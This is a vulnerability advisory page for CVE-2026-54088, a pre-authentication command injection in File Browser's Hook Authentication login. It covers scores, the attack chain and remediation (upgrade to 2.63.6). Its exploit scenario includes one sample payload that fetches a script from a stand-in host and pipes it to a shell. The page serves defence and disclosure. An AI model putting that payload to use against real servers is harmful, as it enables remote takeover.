Skip to main content

File Browser EUVDEUVD-2026-39510

| CVE-2026-54088 CRITICAL
OS Command Injection (CWE-78)
2026-06-25 GitHub_M GHSA-m93h-4hw7-5qcm
9.3
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
9.3 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
9.8 CRITICAL

Network-reachable login, no auth or interaction once Hook Auth is enabled (PR:N/UI:N/AC:L), yielding full RCE with high C/I/A; scope unchanged as commands run within the server's own context.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

2
Patch available
Jun 25, 2026 - 20:03 EUVD
Analysis Generated
Jun 25, 2026 - 18:55 vuln.today

DescriptionCVE.org

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.6, the Hook Authentication feature in File Browser allows administrators to delegate login verification to an external shell command. User-supplied credentials (username and password) are interpolated into this command string using os.Expand without sanitization. An unauthenticated remote attacker can inject shell metacharacters in the username or password field at the login screen, causing the server to execute arbitrary OS commands before any authentication takes place. This is a critical pre-authentication RCE. This vulnerability is fixed in 2.63.6.

AnalysisAI

Pre-authentication remote code execution in File Browser before 2.63.6 lets unauthenticated attackers run arbitrary OS commands when the optional Hook Authentication feature is enabled. Because login credentials are interpolated into an external shell command via os.Expand without sanitization, shell metacharacters placed in the username or password field at the login screen execute on the server before authentication occurs. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach File Browser login page
Delivery
Inject shell metacharacters in username/password
Exploit
Hook command interpolated via os.Expand
Execution
Shell executes injected OS commands pre-auth
Impact
Remote code execution as server process

Vulnerability AssessmentAI

Exploitation Exploitation requires the File Browser instance to have the optional Hook Authentication feature enabled (login verification delegated to an external shell command) - this is the exact prerequisite and it is not the default. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment All severity signals point to genuine high priority: the CVSS 4.0 vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N describes a network-reachable, low-complexity, unauthenticated attack with full confidentiality, integrity, and availability impact on the vulnerable system, scoring 9.3. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who can reach the login page of a File Browser instance configured with Hook Authentication submits a username or password containing shell metacharacters, e.g. a payload like '; curl http://evil/x | sh ;'. …
Remediation Upgrade to File Browser 2.63.6, which contains the vendor fix (Vendor-released patch: 2.63.6); see the advisory at https://github.com/filebrowser/filebrowser/security/advisories/GHSA-m93h-4hw7-5qcm. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Audit all File Browser instances to determine if Hook Authentication is enabled; if exposed to untrusted networks, disable the feature or restrict network access to trusted IP ranges. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-29188 CRITICAL POC
9.1 Mar 05

Unauthorized file operations in File Browser before fix. PoC and patch available.

CVE-2023-39612 CRITICAL POC
9.0 Sep 16

A cross-site scripting (XSS) vulnerability in FileBrowser before v2.23.0 allows an authenticated attacker to escalate pr

CVE-2026-25890 HIGH POC
8.1 Feb 09

Path normalization bypass in Filebrowser prior to 2.57.1 allows authenticated users to circumvent file access restrictio

CVE-2025-52995 HIGH POC
8.0 Jun 30

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, previ

CVE-2025-52902 HIGH POC
7.6 Jun 26

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, previ

CVE-2026-28492 MEDIUM POC
6.5 Mar 05

File Browser versions prior to 2.61.0 incorrectly set the filesystem root to a parent directory when generating public s

CVE-2025-52997 MEDIUM POC
5.9 Jun 30

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, previ

CVE-2025-52900 MEDIUM POC
5.5 Jun 26

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, previ

CVE-2026-25889 MEDIUM POC
5.4 Feb 09

Filebrowser versions prior to 2.57.1 allow authenticated users to reset passwords without verifying the current password

CVE-2026-48777 CRITICAL
9.3 Jun 16

Path traversal in FileBrowser Quantum (gtsteffaniak fork) versions prior to 1.3.2-stable, 1.4.0-beta, and 1.4.1-beta all

CVE-2026-23849 MEDIUM POC
5.3 Jan 19

Filebrowser versions up to 2.55.0 contains a vulnerability that allows attackers to enumerate valid usernames by measuri

CVE-2026-54089 CRITICAL POC
9.1 Jun 25

Authentication bypass and privilege escalation in File Browser (versions 2.0.0-rc.1 and later) lets a remote unauthentic

Share

EUVD-2026-39510 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy